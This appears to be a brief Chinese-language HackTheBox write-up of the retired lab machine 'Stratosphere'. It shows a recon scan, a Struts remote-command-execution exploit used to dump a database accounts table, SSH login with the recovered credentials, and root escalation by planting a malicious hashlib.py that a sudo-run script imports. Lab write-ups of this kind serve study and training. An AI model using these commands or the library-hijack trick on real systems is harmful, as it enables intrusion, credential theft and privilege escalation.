HTB-靶机-Stratosphere

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.64

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.64 -o ./Stratosphere-autorecon

访问web应用

没找到有用的信息，再爆破下目录发现如下信息

看url地址显示猜测有Struts命令执行漏洞，搜索了下对应的exploit测试如下

可以执行命令，有了如下操作

 python 41570.py http://10.10.10.64/Monitoring/example/Welcome.action 'mysql -u admin -p admin -e "use users;select * from accounts"'

得到了数据库密码，试了下ssh登录

执行sudo -l得到如下

可以直接提权了，执行test.py的时候加载了hashlib，通过修改hashlib直接读取root.txt

echo 'import os; os.system("cat /root/root.txt")' > hashlib.py